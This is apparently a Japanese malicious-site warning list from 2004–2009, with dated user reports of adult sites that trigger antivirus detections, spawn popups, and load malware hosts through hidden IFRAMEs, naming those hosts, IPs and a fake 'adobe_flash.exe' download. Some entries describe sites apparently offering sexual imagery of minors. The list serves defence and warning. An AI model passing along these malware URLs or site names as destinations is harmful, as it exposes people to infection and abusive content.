「Downloader.Trojan 、Trojan.Bookmarker 、w32.conycspa.G@mm というのに感染しているようなのですが。。」 |
| [2005/11/11] | 踏むとウィルス名:JS_INOR.AB を検出すると同時に この窓 も開く。しかし、この窓はタスクバーに現れない。それを閉じるとウィルス名:VBS_PSYME.AN を2つ検出。
元の//lol.to/add-gb.php?book=smallol&action=new&pg=1は海外アダルトサイト。 このアダルトサイトをリロードしたり閉じたりすると以下の @ に一瞬飛ぶが、その後すぐに A に飛ぶ。 @、//www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1 A、//www.otsos.ru/ → キャプ画像 しかし、2回目以降の確認では上記の挙動をするものの、ウィルス反応は無かった。 ウィルスの元凶は以下の B だと思われるが、 B は繋がったり、「Internal Server Error」になったりする。 B、//85.255.113.10/?to=nan40&from=in B にうまく繋がるとウィルス検出。サーバーエラーだと無害で終わると思われる。 |
| [2007/02/25] | 動画が再生出来るようだが、HDDが唸り出し、ランダムに違うアダルトサイトを表示する。
今回はバスター無反応であったが、他社製アンチウィルスソフトではウィルス反応があると思われる。 |
| [2005/11/19] | こんな感じ のアダルトサイトを表示し、ウィルス名:JS_INOR.AB を検出。別窓は これ 。この別窓はタスクバーに現れない。
別窓は普通に閉じることができ、閉じると暫らくHDDが唸ってウィルス名:VBS_PSYME.AN を検出。その直後、ウィルス名:JAVA_BYTEVER.A を検出。 |
| [2006/06/24] | 海外アダルトサイト。バスター無反応だが、他アンチウィルスソフトではウィルス反応があると思われる。
ソースを見ると以下のURLをIFRAMEタグで呼び出している。 //lol.to/add.php?bbs=gastboeknl&action=new&pg=1 |
| [2006/06/24] | 他の方の結果は以下の「」内。
「一応ビデオのオマケつきロリータ画像サイト、ではあるが下の方の「画像」が全部、拡張子偽造のスクリプトになっていて、これに引っかかるブラウザだと、大方はこれを読み込んだ瞬間にエラい目に遭うという仕組みですな。 でもまあ対策立てるのが厳しいというほど手の込んだ事はやってないような気がする。メモリ消費であぼーんについてはアンチウイルスソフトが逆に仇になってそうな予感も。で、もう一方も似たような感じだが何処がトラップですかね?画像その他は同じだから見る価値もないか。」 「動画が再生され始めましたが、ノートンにてウィルス反応がありました。ウィルス名:Hacktool 閲覧注意。」 |
| [2005/10/26] | 海外アダルトサイト。HDDが唸り出し、この別窓 を表示しつつ、ウィルス名:JS_INOR.AB を検出。その後もHDDが唸り続き、少し経つとウィルス名:VBS_PSYME.AN を検出。
閉じると //www.otsos.ru/index2.htm を表示する。以下は他の方の結果。 「複数のウイルス反応、ゾンビウインドウ有り。危険URLを呼び出してます。」 「呼び出されるページにスパイウェアがありそうです。踏まれた方は一応チェック推奨です。」 「McAfeeでは、下記3種類のトロイを検出しました。「Exploit-MhtRedir」「VBS/Psyme」「Exploit-ByteVerify」」 |
| [2006/02/06] | 海外アダルトサイトだが、「res.wmf」ファイルをDLしろ、と言ってきたりし、ウィルス名:EXPL_WMF.GEN を検出。そのうち、ウィルス名:JAVA_BYTEVER.A を複数検出する。その後、色々なアダルトサイトがいくつか開く。
その中には再び「res.wmf」ファイルをDLしろ、と言ってきたりし、ウィルス名:EXPL_WMF.GEN を検出するものもある。 |
| [2005/09/24] | 踏むと こんな感じ で、別窓1枚付きだが、ウィルス名:VBS_PSYME.AN+JAVA_BYTEVER.A を検出。
閉じると//www.otsos.ru/cgi-bin/gc3/in.cgi?baas844&1を新窓表示するが、真っ白なページ。 |
| [2005/07/10] | ウィルス名:JAVA_BYTEVER.A 。別窓が以下の2つ。
1、//www.galleriez.org/ ← 海外アダルトサイト。 2、「COOL BBS」という名のWEBページダイアログ。 このURLはIFRAMEタグで以下の2つを呼んでいる。 3、//195.95.218.173/dl/adv659.php 4、//205.252.250.226/zator/adv3048/ |
| [2004/04/01] | アダルトサイトだが Nippon_sex.exe というQ2接続ソフトをインストールさせようとする。 |
| [2004/11/07] | 踏むと声付きのアダルトサイト。別窓で全画面表示。ウィルス反応無し。
別窓の全画面表示のほうは Alt+F4 で閉じれるが声付きのアダルトサイトのほうを閉じると別窓で2枚の別窓表示。1枚は404。もう1枚はアダルトリンクサイト。 |
| [2005/03/31] | 踏むと海外アダルトサイトだが、ウィルス名:TROJ_DYFUCA.X を検出。検出後、この小窓 を表示する。
「キャンセル」を選ぶと別窓でランキングのようなページを2枚表示。 ところが、小窓の「OK」を踏んで確認しようと最初から掘っていくと、今度はウィルスさえ検出されず、小窓も出てこない。その後、何度確認しても同様。「OK」を選んだ場合は未鑑定。 |
| [2005/07/07] | ウィルス名:JAVA_BYTEVER.A 。別窓は以下の2つ。
1、「COOL BBS」というアドレスバーが無い窓。 2、//www.galleriez.org/ ← バスター無反応。 |
| [2004/12/21] | ウィルス名:HTML_MHTREDIR.A+JAVA_BYTEVER.A 。CoolWebSearchの別窓表示あり。 |
| [2005/07/02] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C
IFRAMEタグで以下の2つのURLを呼び出している。 //195.95.218.173/dl/adv659.php //205.252.250.226/zator/adv3048/ |
| [2005/05/22] | ウィルス名:TROJ_ANICMOO.G |
| [2005/02/24] | 海外アダルト検索サイトだが別窓で「WEB SEX SEARCH」という検索サイトを表示。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。 |
| [2005/05/09] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C |
| [2005/11/10] | 踏むと こんな感じ のサイトだが、タスクバーに現れない これ も表示し、ウィルス名:JS_INOR.AB を検出。閉じると //www.otsos.ru/ を表示する。 |
| [2005/02/24] | 「WEB SEX SEARCH」という検索サイト。CoolWebSearch画面の新型かも?
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出。 |
| [2005/03/13] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C |
| [2005/02/28] | 踏むとアダルト検索ページだが SEX WEB SEARCH という画面に変わる。
この時、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出する時とウィルス検出されずにフリーズする場合がある。 |
| [2005/07/18] | ウィルス名:JAVA_BYTEVER.A 。別窓で「Adult Sex Portal」なるページを表示。 |
| [2005/07/05] | ウィルス名:JAVA_BYTEVER.A 。IFRAMEタグで以下の2つのURLを呼び出す。
//195.95.218.173/dl/adv659.php //205.252.250.226/zator/adv3048/ |
| [2004/12/10] | ウィルス名:JAVA_BYTEVER.A+HTML_REDIR.A+JS_OBJDATA.A 。CoolWebSearch画面表示を確認。 |
| [2005/06/22] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C
IFRAMEタグで//195.95.218.173/dl/adv659.phpを呼んでいる。 |
| [2005/01/13] | ウィルス名:EXPL_SHEXPLOIT.A |
| [2005/01/04] | ウィルス名:JAVA_BYTEVER.A |
| [2005/04/22] | 踏むと洋炉エロサイト。バスター無反応。悪意あるActiveXの実行をしようとしてくる。
アンチドートでウイルス名:Exploit.HTML.Mhtを検出するらしい。 見てみると、IFRAMEタグで//allways.drusearch.com/traf/458/in.htmlを呼んでいる。詳細はこのURL解説を参照。 |
| [2006/06/23] | ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC+EXPL_WMF.GEN+TROJ_NASCENE.Y
この 小窓 付きで、真っ白なページだが、中央やや左で「何か」を呼び出している形跡がある。 FRAMEタグで、//countbest.net/adv/135/new3.php を呼び出している。 また、「xpl.wmf」ファイルもDLしろ、と言ってくる。 また、これ を8枚表示する。 |
| [2005/11/10] | 他の方の結果は以下。
当環境では"Close now"みたいなアラートがでて、ブラクラ並にエロサイト開きまくりです。その時ノートンが"MHTMLRedir.Exploit"を検出しました。」 「ろりぽっぽはゾンビウィンドウが出た後、有害鯖を読み込むようですから、ポップブロックしていると無害っぽいですね。」 |
| [2005/11/10] | 踏むと こんな感じ のサイト。このサイトは妙な挙動をする。
このサイトを表示した時点で、PCのセキュリティ環境により、これ を表示する。 最初の この画面 で、画面上部の「Close Window」をクリックしてもこれ を表示するが、何故か点滅している。 ちなみに画面上部の「Close Window」のリンク先は こんな感じ になっている。 これ を表示していると、スクリプトエラーのあるアダルトサイトが ややブラクラ並に表示していくが、これも何故か点滅している。 これらのアダルトサイトはツールバーやアドレスバーが無い。しかも、これ もディスクトップ画面の右下に複数表示する。 これらアダルトサイトは閉じると全画面表示や別のアダルトサイトを表示する。その過程でウィルス名:VBS_PSYME.ANを検出。他の方の鑑定ではノートンでウィルス名:MHTMLRedir.Exploitを検出。 表示するサイトの中には こんな窓 を表示ものもある。 その間もツールバーやアドレスバーが無いアダルトサイトや これ が次々と表示していく。 元の//lolipop.pro.tc/を この画面 の状態で閉じても上記の同じ現象を確認。 私が何回か踏んで脱出した結果、 1、Alt+F4押しっぱなし は可能だが、脱出できるかどうかの確率は5〜6割程度だと判断。 2、強制終了は 可能だが、これ が表示していると無理と思われる。 3、ポプアプ無効にしていると これ 表示出来ないため、無害で終わると思われる。 |
| [2004/09/04] | IFRAMEタグで //82.196.67.62/f.html を呼び、ウィルスを感染させる。 |
| [2005/04/09] | 踏むと洋エロサイト。ノートン無反応。バスター無反応。
しかし、IFRAMEタグで詳細不明の //ecstazy.ya-hoo.biz を縦0ドット、横0ドットで呼び出している。 |
| [2005/08/16] | 海外アダルトサイト。踏むとウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A を検出。
2回目以降の確認では、ウィルス名:EXPL_IFRAMEBO.A+JAVA_BYTEVER.A を検出。 このサイトを表示したまま20秒くらい放っておくと別窓を表示する。その別窓はランダムで色々な海外アダルトサイトを表示。 別窓からもウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A を検出する。稀に検出しない別窓も表示する。 元の //lolitas-teens.com/ を閉じると別のアダルトサイトを新窓表示。この新窓からもウィルス名:HTML_RIDER.AI+JAVA_BYTEVER.A を検出する。 この新窓もランダムで色々なアダルトサイトを表示。 元の //lolitas-teens.com/ のソースを見るとIFRAMEタグを使って下のURLを呼び出している。 //85.255.113.18/inc/bundy4.html …@ また、ランダムに表示される別窓のほとんどがIFRAMEタグを使って下のURLを呼び出している。 //afris.biz/new.html …A @、A ともウィルスURLである。詳細はURL解説を参照。 |
| [2005/09/12] | 改めて確認。海外アダルトサイト。ウィルス名:EXPL_IFRAMEBO.A+JAVA_BYTEVER.A
また、放っておくと違うアダルトサイトを別窓で開く場合がある。 ウィンドウ画面内で、右クリック一発で違うアダルトサイトを別窓で開く場合と開かない場合がある。 また、「更新」ボタンを押しても違うアダルトサイトを別窓で開く場合と開かない場合がある。 この違うアダルトサイトを別窓で表示するURLは ほとんどがウィルス憑きURLと思われる。 私が確認して表示したURL結果は以下。URLは他にもあると思われる。 1回目、//www.thumbstower.com/ ← ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A 2回目、//www.teensexualitypics.com/ ← ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A 3回目、//alexa69.com/ ← ウィルス名:JAVA_BYTEVER.A また、元の//lolitas-teens.com/を閉じると違うアダルトサイトを新窓表示。 この新窓表示からもウィルスを検出。そのURLは例えば下。URLは他にもあると思われる。 //teensspace.com/?lolitas-teens.com 元の//lolitas-teens.com/のソースを見るとIFRAMEタグで下のURLを呼び出している。 //85.255.113.18/inc/bundy4.html ← 詳細はこのURL解説を参照。 |
| [2005/03/30] | バスター無反応だが、環境によりIE起動の度にアダルトページへ飛ばされるようになってしまうらしい。 |
| [2005/03/31] | //teenysexland.com/ に飛ぶ。閉じると「TARGET SEARCH」というページを表示。その後、閉じると別サイトの新窓表示、これが暫らく続く。 |
| [2005/04/05] | 改めて確認すると、踏むと洋ロリサイト。バスター無反応で、閉じても「TARGET SEARCH」別窓表示は確認できなかった。
ソースを見るとIFARMEタグで //ecstazy.ya-hoo.biz を呼び出しているが、そこを掘っていくと //ecstazy.ya-hoo.biz/a/hta.php?e まで行き、HTML ApplicationファイルをDLできるようだが、ファイルが無くなっているのか分からないがDLできない。 私の環境では怪しい挙動は無かったが、IFARMEタグで //ecstazy.ya-hoo.biz を縦0ドット、横0ドットの大きさで呼び出している以上、何かあると思われるが詳細は分からず。 以下は他の方が踏まれた結果を編集して掲載。 踏んだら再起動したときデスクトップが立ち上がらなくなった。 いまタスクマネージャから専用ブラウザ立ち上げて書き込んでる。 下のタスクバーすら表示されず、Spybotでも削除しきれないのがある。 |
| [2005/04/06] | 他の方が踏まれた結果では、ウィルス付きサイト( ウィルス名:Bloodhound.Exploit.10 )+広告一つ。広告によって勝手に他のサイトへ飛ばされるが404。 |
| [2005/04/07] | 他の方の鑑定結果は以下。
踏んで、その後挙動不審。OS再起動後にウィルス名:TROJ_SMALL.AFG を検出し、データを修復したとのバスターのメッセージが出る。 ↑ この挙動は私の環境でも確認。しかし、踏んでOS再起動するたびに検出されるのではなく、再起動数回に1回だった。 |
| [2005/04/10] | 環境により、WindowsMediaPlayerが見れなくなる可能性があるらしい。 |
| [2005/04/28] | −他の方が踏まれた場合を編集−
「これを踏んだら1分に1回、広告サイトが出てくるようになりました。広告は //bigbuks.info/ が出てきます。Ad-Awareでスキャンして消しても生き残っています。」 |
| [2005/05/01] | 洋炉サイトだが、ノートンがウィルス名:MHTMLRedir.Exploit を検出。また、怪しいActiveXダウンロードがブロックされる。 |
| [2005/04/07] | バスター無反応。ノートンではウィルス名:Bloodhound.Exploit.10 を検出。
IFARMEタグで//ecstazy.ya-hoo.bizを縦0ドット、横0ドットの大きさで呼び出しているが詳細は不明。 |
| [2009/02/25] | 2008/09/14 にDLしたファイルと、2009/01/30 にDLしたファイルにはウィルス名:TROJ_QHOST.RD として対応済。
ただし、現在は 404 になっている。 |
| [2005/09/05] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Dldr.Petrolin.A Avast → Win32:Trojan-gen. AVG → Downloader.Small.31.AM BitDefender → Trojan.Downloader.Petrolin.A ClamAV → Trojan.Downloader.Petrolin-1 Dr.Web → Trojan.DownLoader.1195 Fortinet → W32/Petrolin.A-tr Kaspersky → Trojan-Downloader.Win32.Petrolin.a NOD32 → a variant of Win32/TrojanDownloader.Agent.NAJ VBA32 → Trojan-Downloader.Win32.Petrolin.a |
| [2005/08/04] | どちらもランダムで海外ロリサイトが出てくるが、何度かリロードすると有害サイトにヒットする。
ActiveXコントロールを指示してきたり妙な動き多発。 |
| [2008/12/26] | ウィルス名:TROJ_AGENT.AJZG |
| [2006/09/01] | 2006/08/13 にトレンドマイクロ社にDL+解凍して現れた「lovefreegames.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:ADW_BETTERNET.O として検出するよう対応、とのこと。 2006/08/13 にDLしたファイルからウィルス名:ADW_BETTERNET.O を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_BETTERNET.O を検出することを確認。 |
| [2006/12/01] | 2006/11/18 にトレンドマイクロ社にcabファイルの中の「dr-lfg-package.exe」ファイルを提出。
2006/11/29 にその結果の連絡があり、ウィルス名:SPYW_SIDESEARC.C として検出するよう対応、とのこと。 実際に 2006/11/18 にDLしたファイルと今日改めてDLしたファイルからウィルス名:SPYW_SIDESEARC.C を検出することを確認。 2006/11/18 から今日まではファイルは置き換えられていないと推測される。 |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TSPY_NILAGE.BDN として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルからウィルス名:TSPY_NILAGE.BDN を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとウィルス名:Possible_Lineage を検出する。 |
| [2005/07/15] | ウィルス名:JS_DOWNLOAD.D+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1
数秒ごとに色々な海外アダルトサイトを表示していく。 |
| [2009/05/23] | ファイルサイズ:86.0 KB 。ウィルス名:ADW_AIWT
スパイウェアの一種:アドウェアに属するものと思われる。 |
| [2005/01/09] | ウィルス名:JAVA_BYTEVER.A |
| [2007/02/14] | ウィルス名:TSPY_BANCOS.BWR |
| [2008/09/14] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_RENOS.ADX |
| [2008/09/14] | ウィルス名:TSC_GENCLEAN+TROJ_RENOS.AFD |
| [2008/09/14] | こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+HTML_AGENT.AVYZ を検出。
以下のファイルをDLしろ、と催促してくることがあるが、このファイルからウィルス名:TSC_GENCLEAN+TROJ_RENOS.AFD を検出。 //lunchboxcafe.ru/adobe_flash.exe ソースを見ると、ほとんどがコード変換されている。 |
| [2008/09/14] | こんな感じ のサイトだが、ウィルス名:TSC_GENCLEAN+JS_AGENT.ALCQ を検出。
以下のファイルをDLしろ、と催促してくることがあるが、このファイルからウィルス名:TSC_GENCLEAN+TROJ_RENOS.AFD を検出。 //lunchboxcafe.ru/adobe_flash.exe |
| [2008/10/26] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。左上のほうに「/* */」と書かれている。 |
| [2008/10/26] | 真っ白なページだが、ウィルス名:POSSIBLE_SCRDL を検出。左上のほうに「Loading......」と書かれている。 |
| [2008/10/26] | 真っ白なページだが、ウィルス名:JS_SNAPEX.B を検出。 |
| [2008/10/26] | 真っ白なサイトだが、ウィルス名:POSSIBLE_SCRDL+JS_SNAPEX.B を検出。
このサイトは、'RealNetworks,Inc.'からの'RealPlayer plug-in for Internet Explorer'アドオンを実行しようとしている。 |
| [2008/10/26] | 真っ白なページだが、ウィルス名:JS_REAPLAY.B を検出。左上のほうに「/* */」と書かれている。 |
| [2005/12/29] | 海外アダルトサイト。閉じようとするとすぐには閉じれず、暫くして これ を表示する。それを閉じると元の//lustgal.com/もろとも閉じる。
2回目の確認では、違う海外アダルトサイトを表示する。これ は表示しなかった。 他の方の結果では、 「サーバーに仕掛けがしてあるようで、最初に表示したサイトを閉じるとまたポップアップしてCPU100%になるブラクラサイトを表示する。同じIPアドレスだと二度目以降はブラクラサイトを送って来ない。そこのサーバーにアクセスすると、シナ地方からUDP1026ポートにしきりにパケットが飛んで来る。」 |
| [2005/12/29] | 他の方の結果は以下の「」内。
「洋エロサイトが大窓で開き、閉じると洋サーチサイトが開きます。画像に関連したアプリが開かれそうになりました。 **新種ウイルスの速報** Windows XP SP2 に未知の重大な欠陥。WMF ファイルを読み込むことで、任意のコードが実行されてしまう。 と同じような動きのようです。 Exploitテストページでの挙動と似ていたので途中でプロセスを許可せず実行しませんでした。」 |
| [2008/12/09] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2008/12/09] | ウィルス名:WORM_SDBOT.BRX |
| [2005/04/29] | ウィルス名:JS_PSYME.AF。//www.googkle.com/と同じ現象が起きる。詳細は//www.gookle.com/のURL解説を参照。 |
| [2005/08/08] | ウィルス名:ADW_ISTBAR.AP [ ウィルスバスター ]
ウィルス名:Trojan-Downloader.JS.IstBar.j [ アンチドート ] |